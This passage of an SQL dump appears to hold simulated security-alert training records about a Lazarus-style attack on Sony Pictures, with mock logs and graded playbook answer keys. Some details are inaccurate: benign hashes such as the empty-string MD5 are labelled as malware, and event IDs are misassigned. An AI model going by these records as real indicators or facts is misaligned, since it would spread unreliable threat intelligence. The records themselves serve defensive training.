access.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.190Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:22:05Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"j.doe\\\",\\\"deleted_files\\\":[\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\malicious_log.bak\\\",\\\"C:\\\\\\\\Users\\\\\\\\j.doe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\APT29_trace.txt\\\"],\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"File Deletion\\\",\\\"log_source\\\":\\\"Windows Security\\\",\\\"message\\\":\\\"User j.doe executed file deletion commands to remove traces of unauthorized access.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.190Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:22:05Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"j.doe\\\",\\\"deleted_files\\\":[\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\malicious_log.bak\\\",\\\"C:\\\\\\\\Users\\\\\\\\j.doe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\APT29_trace.txt\\\"],\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"File Deletion\\\",\\\"log_source\\\":\\\"Windows Security\\\",\\\"message\\\":\\\"User j.doe executed file deletion commands to remove traces of unauthorized access.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.190Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:22:05Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"j.doe\\\",\\\"deleted_files\\\":[\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\malicious_log.bak\\\",\\\"C:\\\\\\\\Users\\\\\\\\j.doe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\APT29_trace.txt\\\"],\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"File Deletion\\\",\\\"log_source\\\":\\\"Windows Security\\\",\\\"message\\\":\\\"User j.doe executed file deletion commands to remove traces of unauthorized access.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.190Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:22:05Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"j.doe\\\",\\\"deleted_files\\\":[\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\malicious_log.bak\\\",\\\"C:\\\\\\\\Users\\\\\\\\j.doe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\APT29_trace.txt\\\"],\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"File Deletion\\\",\\\"log_source\\\":\\\"Windows Security\\\",\\\"message\\\":\\\"User j.doe executed file deletion commands to remove traces of unauthorized access.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(564, 'Initial Access via Phishing', 'medium', 'Email Security Logs', 'Lazarus Group initiates the attack by deploying phishing emails to Sony employees, leading to network infiltration.', 'Phishing Attack', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:22:43Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"email_subject\":\"Urgent: Action Required for Sony Account Update\",\"email_from\":\"it-support@sonypictures.com\",\"email_to\":\"john.doe@sonypictures.com\",\"attachment\":\"update-instructions.pdf\",\"attachment_hash\":\"3d2c9c6e1f8b2c1ddf3f2c9e1b8c3d2c\",\"malicious_link\":\"http://malicious-update.com/login\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-01-07 22:40:38', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of Sony Pictures network.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"it-support@sonypictures.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Spoofed email address used in phishing campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3d2c9c6e1f8b2c1ddf3f2c9e1b8c3d2c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known phishing PDF attachment.\"}},{\"id\":\"artifact_5\",\"type\":\"url\",\"value\":\"http://malicious-update.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Scan\",\"verdict\":\"malicious\",\"details\":\"URL used for credential harvesting.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\"]}', 'Beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.192Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:22:43Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"email_subject\\\":\\\"Urgent: Action Required for Sony Account Update\\\",\\\"email_from\\\":\\\"it-support@sonypictures.com\\\",\\\"email_to\\\":\\\"john.doe@sonypictures.com\\\",\\\"attachment\\\":\\\"update-instructions.pdf\\\",\\\"attachment_hash\\\":\\\"3d2c9c6e1f8b2c1ddf3f2c9e1b8c3d2c\\\",\\\"malicious_link\\\":\\\"http://malicious-update.com/login\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.192Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:22:43Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"email_subject\\\":\\\"Urgent: Action Required for Sony Account Update\\\",\\\"email_from\\\":\\\"it-support@sonypictures.com\\\",\\\"email_to\\\":\\\"john.doe@sonypictures.com\\\",\\\"attachment\\\":\\\"update-instructions.pdf\\\",\\\"attachment_hash\\\":\\\"3d2c9c6e1f8b2c1ddf3f2c9e1b8c3d2c\\\",\\\"malicious_link\\\":\\\"http://malicious-update.com/login\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.192Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:22:43Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"email_subject\\\":\\\"Urgent: Action Required for Sony Account Update\\\",\\\"email_from\\\":\\\"it-support@sonypictures.com\\\",\\\"email_to\\\":\\\"john.doe@sonypictures.com\\\",\\\"attachment\\\":\\\"update-instructions.pdf\\\",\\\"attachment_hash\\\":\\\"3d2c9c6e1f8b2c1ddf3f2c9e1b8c3d2c\\\",\\\"malicious_link\\\":\\\"http://malicious-update.com/login\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.192Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:22:43Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"email_subject\\\":\\\"Urgent: Action Required for Sony Account Update\\\",\\\"email_from\\\":\\\"it-support@sonypictures.com\\\",\\\"email_to\\\":\\\"john.doe@sonypictures.com\\\",\\\"attachment\\\":\\\"update-instructions.pdf\\\",\\\"attachment_hash\\\":\\\"3d2c9c6e1f8b2c1ddf3f2c9e1b8c3d2c\\\",\\\"malicious_link\\\":\\\"http://malicious-update.com/login\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.192Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:22:43Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"email_subject\\\":\\\"Urgent: Action Required for Sony Account Update\\\",\\\"email_from\\\":\\\"it-support@sonypictures.com\\\",\\\"email_to\\\":\\\"john.doe@sonypictures.com\\\",\\\"attachment\\\":\\\"update-instructions.pdf\\\",\\\"attachment_hash\\\":\\\"3d2c9c6e1f8b2c1ddf3f2c9e1b8c3d2c\\\",\\\"malicious_link\\\":\\\"http://malicious-update.com/login\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(565, 'Execution of Destover Malware', 'high', 'Endpoint Detection and Response (EDR)', 'The attackers execute the \'Destover\' wiper malware, causing widespread system damage and data destruction.', 'Malware Deployment', 'T1485: Data Destruction', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_id\":\"EDR-2023-1024\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"malware_name\":\"Destover\",\"file_path\":\"C:\\\\Windows\\\\Temp\\\\destover_wiper.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"jdoe\",\"process_id\":5678,\"action\":\"Malware Execution\",\"description\":\"Detected execution of Destover malware on endpoint.\"}', '2026-01-07 22:40:38', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Associated with known APT attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal corporate endpoint.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Destover malware.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Employee account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(566, 'Establishing Persistence - Backdoor Installation', 'medium', 'Network Traffic Analysis', 'A backdoor associated with the Lazarus Group was detected on the network, indicating an attempt to establish persistence on the compromised system.', 'Backdoor Installation', 'T1059 - Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:07Z\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":8080,\"protocol\":\"HTTP\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"uri\":\"/backdoor/installer.php\",\"method\":\"GET\",\"http_version\":\"1.1\",\"filename\":\"backdoor_installer.exe\",\"file_hash\":\"f2d4e2f7c2a2b5e1d4c3b2a1d5e2f4c3\",\"username\":\"jdoe\",\"action\":\"Download\",\"status\":\"200 OK\"}', '2026-01-07 22:40:38', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known Lazarus Group infrastructure.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f2d4e2f7c2a2b5e1d4c3b2a1d5e2f4c3\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Lazarus Group backdoor installer.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"backdoor_installer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"File known to be used by Lazarus Group for persistence.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account involved in suspicious download activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(567, 'Lateral Movement Within Network', 'high', 'Internal Server Logs', 'During step 4 of the operation, the Lazarus Group has moved laterally within the network, identifying critical systems for further exploitation. This activity was detected through internal server logs showing unauthorized access attempts and suspicious file transfers.', 'Internal Network Reconnaissance', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:45:23Z\",\"event_id\":\"4720\",\"source_ip\":\"10.1.2.3\",\"destination_ip\":\"192.168.10.5\",\"attacker_ip\":\"203.0.113.45\",\"user\":\"network_admin\",\"action\":\"login_attempt\",\"result\":\"success\",\"file_transferred\":\"exploit_tool_v2.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"target_system\":\"192.168.10.5\",\"protocol\":\"SMB\",\"notes\":\"Possible use of stolen credentials to access sensitive systems.\"}', '2026-01-07 22:40:38', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.2.3\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal network source IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Target system within network\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known to be associated with Lazarus Group\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"exploit_tool_v2.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Unfamiliar executable transferred internally\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malicious tools\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.195Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:23Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"source_ip\\\":\\\"10.1.2.3\\\",\\\"destination_ip\\\":\\\"192.168.10.5\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"network_admin\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"result\\\":\\\"success\\\",\\\"file_transferred\\\":\\\"exploit_tool_v2.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"target_system\\\":\\\"192.168.10.5\\\",\\\"protocol\\\":\\\"SMB\\\",\\\"notes\\\":\\\"Possible use of stolen credentials to access sensitive systems.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.195Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:23Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"source_ip\\\":\\\"10.1.2.3\\\",\\\"destination_ip\\\":\\\"192.168.10.5\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"network_admin\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"result\\\":\\\"success\\\",\\\"file_transferred\\\":\\\"exploit_tool_v2.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"target_system\\\":\\\"192.168.10.5\\\",\\\"protocol\\\":\\\"SMB\\\",\\\"notes\\\":\\\"Possible use of stolen credentials to access sensitive systems.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.195Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:23Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"source_ip\\\":\\\"10.1.2.3\\\",\\\"destination_ip\\\":\\\"192.168.10.5\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"network_admin\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"result\\\":\\\"success\\\",\\\"file_transferred\\\":\\\"exploit_tool_v2.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"target_system\\\":\\\"192.168.10.5\\\",\\\"protocol\\\":\\\"SMB\\\",\\\"notes\\\":\\\"Possible use of stolen credentials to access sensitive systems.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.195Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:23Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"source_ip\\\":\\\"10.1.2.3\\\",\\\"destination_ip\\\":\\\"192.168.10.5\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"network_admin\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"result\\\":\\\"success\\\",\\\"file_transferred\\\":\\\"exploit_tool_v2.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"target_system\\\":\\\"192.168.10.5\\\",\\\"protocol\\\":\\\"SMB\\\",\\\"notes\\\":\\\"Possible use of stolen credentials to access sensitive systems.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.195Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:23Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"source_ip\\\":\\\"10.1.2.3\\\",\\\"destination_ip\\\":\\\"192.168.10.5\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"network_admin\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"result\\\":\\\"success\\\",\\\"file_transferred\\\":\\\"exploit_tool_v2.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"target_system\\\":\\\"192.168.10.5\\\",\\\"protocol\\\":\\\"SMB\\\",\\\"notes\\\":\\\"Possible use of stolen credentials to access sensitive systems.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(568, 'Data Exfiltration via Proxy Chains', 'high', 'Proxy Server Logs', 'Sensitive data, including unreleased films and executive emails, is exfiltrated using complex proxy chains to obfuscate the attack origin. This operation is linked to the Lazarus Group, known for using destructive malware and financial theft tactics.', 'Data Theft', 'T1048.002 - Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Pr', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.56\",\"proxy_chain\":[\"10.1.1.1\",\"172.16.0.5\",\"203.0.113.56\"],\"username\":\"jdoe\",\"file_exfiltrated\":\"executive_emails.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"exfiltration\",\"protocol\":\"HTTPS\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\"}', '2026-01-07 22:40:38', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal host involved in exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data theft activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious data exfiltration tools.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"executive_emails.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_filesystem\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file targeted for exfiltration.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_database\",\"verdict\":\"internal\",\"details\":\"Internal user account possibly compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.196Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.56\\\",\\\"proxy_chain\\\":[\\\"10.1.1.1\\\",\\\"172.16.0.5\\\",\\\"203.0.113.56\\\"],\\\"username\\\":\\\"jdoe\\\",\\\"file_exfiltrated\\\":\\\"executive_emails.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.196Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.56\\\",\\\"proxy_chain\\\":[\\\"10.1.1.1\\\",\\\"172.16.0.5\\\",\\\"203.0.113.56\\\"],\\\"username\\\":\\\"jdoe\\\",\\\"file_exfiltrated\\\":\\\"executive_emails.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.196Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 